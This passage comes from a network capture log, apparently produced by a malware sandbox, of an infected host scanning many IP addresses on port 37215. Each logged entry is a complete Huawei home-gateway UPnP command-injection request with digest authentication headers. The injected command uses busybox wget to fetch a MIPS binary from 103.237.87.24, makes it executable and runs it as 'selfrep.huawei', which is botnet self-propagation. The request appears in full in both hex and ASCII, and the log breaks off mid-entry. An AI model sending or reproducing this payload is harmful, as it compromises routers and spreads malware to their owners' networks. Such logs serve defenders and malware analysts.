2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1267192.168.2.135701288.33.88.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449958086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1268192.168.2.1333326198.232.129.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449973106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1269192.168.2.1342422197.148.155.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.449984074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1270192.168.2.1354224116.185.205.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450114965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1271192.168.2.1356834157.177.203.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450165987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1272192.168.2.1348582157.65.116.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450165987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1273192.168.2.135693041.200.65.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450175047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1274192.168.2.1340868157.184.144.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450186968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1275192.168.2.1348404157.102.131.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450402021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1276192.168.2.1346082206.226.116.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450406075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1277192.168.2.1343408197.79.183.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.450475931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
